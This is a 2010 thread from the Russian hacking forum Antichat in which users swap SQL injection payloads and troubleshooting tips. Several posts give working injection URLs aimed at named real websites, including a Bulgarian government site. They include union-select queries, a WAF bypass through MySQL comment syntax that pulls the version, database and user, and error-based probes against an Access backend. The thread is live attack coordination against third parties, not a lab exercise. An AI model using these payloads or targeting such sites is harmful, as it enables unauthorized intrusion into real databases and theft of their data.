Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.02.2010, 20:59
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
a vot zdes ??
http://www.aspik.am/index.php?p=-5+union+select+1
|
|
|
17.02.2010, 22:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Сообщение от LokbatanLi
a vot zdes ??
http://www.aspik.am/index.php?p=-5+union+select+1
WAF не дремлет...
Код:
http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
|
|
|
|
17.02.2010, 22:30
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
Последний раз редактировалось [Feldmarschall]; 17.02.2010 в 22:34..
|
|
|
|
17.02.2010, 23:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от [Feldmarschall]
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
LIMIT можно:
Код:
WHERE field_name NOT IN (a, b, c ,d)
group_concat - хз...
|
|
|
|
17.02.2010, 23:31
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Пацаны, хелп, плиз )))
Код HTML:
http://www.site.com/script.asp?id=1'+or+1=@@version--
Выдает:
Код HTML:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1' or 1=@@version--'.
/script.asp, line 17
Что за нах**? |
|
|
|
17.02.2010, 23:33
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Access не держит комментарии.
|
|
|
|
17.02.2010, 23:37
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Т.е. нифига не получится?
|
|
|
|
17.02.2010, 23:40
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Т.е екстрасенсы в отпуске
Я написал то, что вижу, исходя из того, что ты дал
Или иди статью читай, или линк давай
|
|
|
|
17.02.2010, 23:44
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Код HTML:
http://www.mlsp.government.bg/showimage.asp?id=1'+or+1=@@version--
Скромно, да? =))
P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.
Последний раз редактировалось ~EviL~; 17.02.2010 в 23:46..
|
|
|
|
18.02.2010, 01:56
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
это Microsoft Access а не MS SQL. Доступа к msysobjects как всегда нету. И в id=1' кавычка не нужна.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
